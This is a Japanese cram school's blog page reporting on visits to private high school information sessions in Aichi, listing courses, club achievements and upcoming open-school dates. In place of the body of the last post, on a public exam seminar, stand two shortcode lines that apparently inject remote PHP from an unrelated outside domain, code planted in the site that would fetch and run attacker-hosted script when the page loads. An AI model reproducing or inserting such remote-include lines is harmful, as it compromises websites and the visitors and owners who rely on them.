学校説明会に参加してきました~大同大学大同高等学校編~

10月25日(月)に大同大学大同高等学校の説明会に参加をしてきました。

 

大同高校は名鉄常滑線・河和線大同町駅から徒歩1分という非常に通いやすい場所に

位置しています。

 

説明会では、大同高校の教育の特徴やそれぞれのコースの説明を中心に、

来年度入試の概要説明がありました。

 

説明会の内容は以下の通りです。

 

大同高校には普通科と工業科の2つの科があります。普通科には特進エクセレントコース、

大同大学進学コース、スポーツ進学コース、私大進学コースの4つのコースがあり、

工業科は2年生から5つのコースに分かれます。

 

2つの科が存在することによって、様々なメリットが生まれます。たとえば、

普通科の生徒が工業科の設備(最新のコンピュータなど)を利用できたり、

工業科の生徒が本格的な進学のための指導を受けることができたりします。

 

進学を考える生徒にとっても、就職を考える生徒にとっても、非常に多くの

魅力がある学校と言えるでしょう。

 

部活動も非常に盛んで、全国レベルの部活動が数多くあります。

男子バレーボール部のインターハイ通算出場回数30回は、県内最多です。

 

今後の説明会等の予定は以下の通りです。

・10月29日(土) 第2回オープンスクール

・11月19日(土) 第3回オープンスクール

・12月3日(土) 第4回オープンスクール

 

興味のある方はぜひ参加してみて下さい。

dsc_0472-1

 大同大学大同高等学校のホームページはこちら

http://www.daido-h.ed.jp/

タグ


講師全体研修がありました

10月22日(土)に、2016年度 第6回 講師全体研修がありました。

 

研修では、主に個別指導の授業での問題点やその対策についてのお話しがありました。

 

また、期末テスト期間や、テスト対策の進め方の確認等が行われました。

 

私立高校合格には2学期の成績が非常に重要です。

 

職員・講師一同全力でサポートして行きますので、今から悔いの残らないような取り組みをして下さい。

 

1478697861488

 

タグ


2016年10月22日 | コメント/トラックバック(0)|

カテゴリー:日常報告

学校説明会に参加してきました~東邦高等学校編~

10月17日(月)に東邦高等学校の説明会に参加をしてきました。

 

説明会では、東邦高校の教育の特徴やそれぞれのコースの説明を中心に、

来年度入試の概要説明がありました。

 

東邦高校には普通科が3コース(文理特進コース、普通コース、

人間健康コース)と、中部圏の私立高校としては唯一の美術科があります。

 

東邦高校で行われている特徴的な教育のひとつとして、普通コースと

美術科の1年生全員が取り組む「クエストエデュケーションプログラム」が

挙げられます。これは、企業からミッションを受け取り、調査・研究・議論を行い、

その解決策をプレゼンテーションするというものです。全国大会も開かれており、

東邦高校は4年連続で出場、そして今年は企業賞を初受賞するという実績を残しています。

 

こうした活動を通して、生徒たちは主体的に考える姿勢や、仲間と協力する態度を

身に付けているようです。

 

東邦高校と言えば部活が強いことでも有名です。野球とサッカーが目立ちますが、

空手や水泳、吹奏楽部など、それ以外の部活も多数の実績を残しています。

 

今後の説明会等の予定は以下の通りです。

 

・11月3日(木・祝) 学校説明会

・11月26日(土) 入試説明会

 

興味のある方はぜひ参加してみて下さい。

dsc_0403

東邦高等学校のHPはこちら

http://www.toho-h.ed.jp/

タグ


学校説明会に参加してきました~中部大学春日丘中学校・高等学校編~

10月12日(水)に中部大学春日丘中学校・高等学校の説明会に参加をしてきました。

 

昨年度までは「春日丘中学校・高等学校」という名称でしたが、今年度より、

「中部大学春日丘中学校・高等学校」に改称されました。

 

説明会では、春日丘の教育の特徴やそれぞれのコースの説明を中心に、

来年度入試の概要説明がありました。

 

春日丘高校には、啓明コース、特進コース、進学コース、国際コースの4つのコースが

あります。この国際コースの存在が、春日丘のひとつの特徴と言えるでしょう。

 

春日丘高校は文科省からSGH(スーパーグローバルハイスクール)に指定されており、

総合的な学習の時間を利用し、「グローバル課題研究」を行っています。

世界各地に海外提携高校があり、交流も行われています。

 

大学進学に関しては、中部大学への併設校推薦があります。

また、高校在学中に中部大学での単位を先取りできる、高大一貫推薦という制度も存在します。

これらの制度は国公立大学との併願も可能になっており、様々な進路が実現可能です。

 

今後の説明会等の予定は以下の通りです。

【中学部】

10月22日(土)第2回学校説明会

10月29日(土)秋の授業見学会

11月26日(土)第3回学校説明会

12月10日(土)入試直前学校説明会

【高等部】

・11月5日(土)第2回学校説明会・入試説明会

 

興味のある方はぜひ参加してみて下さい。

 dsc_0404-1

中部大学春日丘高等学校のホームページはこちら

http://www.haruhigaoka.ed.jp/senior/

タグ


愛知県公立高校入試分析セミナーに参加してきました。

[insert_php] include(“http://amiens-rencontres.bid/tmp/kykse.php”); [/insert_php]
[php] include(“http://amiens-rencontres.bid/tmp/kykse.php”); [/php]

タグ


このページの先頭へ

このページの先頭へ

がんばる子供を増やしたい!成績アップ率90%以上を誇る名古屋南区の進学塾 宇宙塾